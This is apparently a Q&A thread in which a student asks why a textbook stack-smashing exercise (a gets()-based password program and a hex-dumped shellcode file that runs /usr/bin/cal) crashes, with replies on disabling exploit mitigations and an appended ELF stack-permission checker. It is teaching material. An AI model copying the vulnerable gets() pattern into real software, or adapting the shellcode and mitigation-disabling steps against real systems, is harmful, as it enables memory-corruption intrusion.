
I am doing some homework for University and the book I am working from (Secure coding in C and C++ by Robert Seacord) has the following example in it:

You write a simple enter password program and do a stack smash on the program to make the terminal display a calendar snapshot. It's really simple and straightforward as an example of stack smashing. Except I think the book we have to work through was written a long time ago, before segmentation faults covered this sort of activity.

I have searched a lot of sites (I've added -fno-stack-protector to the g++ compiler, and also set kernel.randomize_va_space=0); neither of these allowed the exploit code to execute.

Here is the password C++ code:

#include <cstring>
#include <stdio.h>
#include <iostream>

bool isPasswordOkay(void);

int main(void)
{
    bool PwStatus;

    puts("Enter password:");
    PwStatus = isPasswordOkay();
    if (PwStatus == false)
    {
        puts("Access denied");
        return 0;
    }
    else puts("Access granted");
    return 0;
}

bool isPasswordOkay(void)
{
    char Password[12];   // 12-byte buffer on the stack

    gets(Password);      // no bounds check: input longer than the buffer overwrites the saved
                         // frame pointer and return address above it (the intentional bug here)
    if (!strcmp(Password, "goodpass"))
        return true;
    else
        return false;
}

and here is the exploit code (exploit.bin):

000  31 32 33 34 35 36 37 38-39 30 31 32 33 34 35 36 "1234567890123456"
010  37 38 39 30 31 32 33 34-35 36 37 38 E0 F9 FF BF "789012345678a. +"
020  31 C0 A3 FF F9 FF BF B0-0B BB 03 FA FF BF B9 FB "1+ú . +≠+. +≠v"
030  F9 FF BF 8B 15 FF F9 FF-BF CD 80 FF F9 FF BF 31 ". +ï§ . +−ç . +1"
040  31 31 31 2F 75 73 72 2F-62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal "

Once the password code has been compiled I execute by entering ./a.out < exploit.bin

When executed, the terminal returns "Segmentation fault (core dumped)". What it should show is a snapshot of the calendar found at "111/usr/bin/cal ".

My question is, is there a way to temporarily disable this segmentation fault in order to allow the exploit code to execute? This would allow me to then go on to do the section as I'm a bit stumped at the moment.

Thank you, Jon

EDIT: Unfortunately I can't upload images yet as I'm new, but here is a link to a breakdown of the exploit.bin code: https://i.stack.imgur.com/X65mL.jpg

  • Err.. what about asking your prof/TA, ie. those who are being paid to help you? – Martin James Apr 10 '15 at 15:57
  • because it's late on a Friday and I don't want to spend 3 days waiting for a response – Jonathan Cain Apr 10 '15 at 15:59
  • In that case. perhaps you could spend the weekend disassembling that bin and working out what it does and why it fails? – Martin James Apr 10 '15 at 16:01
  • Ok I could do that, however I'm under the impression that the segmentation fault is part of protection from stack smashing, nothing to do with the bin? The bin is copied straight from the book and the book itself breaks it down for you. If you're saying that's a valid solution then okay I'll give it a shot, but if I spend 3 days doing it and it turns out I was right that it was just Ubuntu protecting the memory, then it's going to be a waste of 3 days. – Jonathan Cain Apr 10 '15 at 16:04
  • If the book has a disassembly, maybe you could post it? – Martin James Apr 10 '15 at 16:04
  • It surely is a hardware memory management exception that is handled by the OS, but why? You need to find out why so you can make some attempt to stop it happening. It's very likely, for instance, that the stack segment is not executable. If the bin relies upon that, it will fail. – Martin James Apr 10 '15 at 16:07
  • .. but you don't know because you have not disassembled the bin, so you don't know how it is supposed to work. – Martin James Apr 10 '15 at 16:09
  • `sysctl -w kernel.exec-shield=0` as root might work. IIRC that was supposed to stop these sorts of exploits – Andrew Henle Apr 10 '15 at 16:12
  • Ok I've added the code. This is the first lecture of my security module, so honestly I'm pretty new to all this so I apologise for my general ignorance. – Jonathan Cain Apr 10 '15 at 16:12
  • Thanks Andrew but exec-shield does not appear to exist in Ubuntu 14.04. To be honest I think I might just go find a much older version of Linux and try this all again. – Jonathan Cain Apr 10 '15 at 16:25
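One diagnostic worth running before changing anything else (an added example, not code from the book or the question): the fault Martin James describes is what you get when the bytes placed on the stack are in a page the loader mapped without execute permission, and that permission is decided by the PT_GNU_STACK program header the linker writes into a.out. The script below parses that header directly, which is the same information `readelf -lW a.out | grep GNU_STACK` prints, and reports whether the stack is RW or RWE; the small ELF image it builds for offline use is constructed sample input, not a real binary.

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551  # p_type of the GNU_STACK program header
PF_X = 0x1                 # executable bit in p_flags

def gnu_stack_flags(data: bytes):
    """Return p_flags of the PT_GNU_STACK header in an ELF image, or None if absent.
    Handles ELF32 and ELF64 in either byte order by reading the header offsets directly."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = data[4] == 2                 # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    end = "<" if data[5] == 1 else ">"  # EI_DATA: 1 = little-endian, 2 = big-endian
    if is64:
        (e_phoff,) = struct.unpack_from(end + "Q", data, 0x20)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 0x36)
    else:
        (e_phoff,) = struct.unpack_from(end + "I", data, 0x1C)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 0x2A)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from(end + "I", data, off)
        # p_flags sits at offset 4 in Elf64_Phdr but at offset 24 in Elf32_Phdr
        (p_flags,) = struct.unpack_from(end + "I", data, off + (4 if is64 else 24))
        if p_type == PT_GNU_STACK:
            return p_flags
    return None

def stack_is_executable(data: bytes) -> bool:
    """True if the loader will map the stack executable. With no GNU_STACK header the
    Linux x86 loader falls back to an executable stack, so None counts as executable."""
    flags = gnu_stack_flags(data)
    return flags is None or bool(flags & PF_X)

def build_elf64(stack_flags: int) -> bytes:
    """Constructed minimal ELF64 image (not a runnable program) with a single
    PT_GNU_STACK header carrying the given p_flags; used as offline sample input."""
    ehdr = b"\x7fELF" + bytes([2, 1, 1]) + b"\x00" * 9   # 64-bit, little-endian, version 1
    ehdr += struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, 0, 64, 0, 0, 64, 56, 1, 0, 0, 0)
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr

if __name__ == "__main__":
    # Pass a real binary (e.g. ./a.out) as argv[1]; otherwise inspect the constructed RW sample
    img = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_elf64(0x6)
    verdict = "executable (RWE)" if stack_is_executable(img) else "non-executable (RW)"
    print("GNU_STACK:", verdict)
```

An RW result means the stack is NX and any code placed there will fault on the first instruction, regardless of the stack-protector and ASLR settings already tried.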
